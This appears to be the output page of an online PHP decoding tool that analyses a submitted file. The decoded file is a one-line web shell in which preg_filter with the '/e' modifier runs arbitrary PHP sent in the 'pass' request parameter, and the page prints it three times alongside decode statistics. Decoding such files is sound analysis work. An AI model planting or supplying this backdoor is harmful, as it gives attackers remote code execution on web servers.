Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php echo preg_filter('|.*|e', $_REQUEST['pass'], ''); ?>..
Decoded Output download
<?php
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
?>
Did this file decode correctly?
Original Code
<?php
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
?>
Function Calls
preg_filter | 1 |
Stats
MD5 | 10321a74127daaf3c9a0af7dde0d53f8 |
Eval Count | 0 |
Decode Time | 132 ms |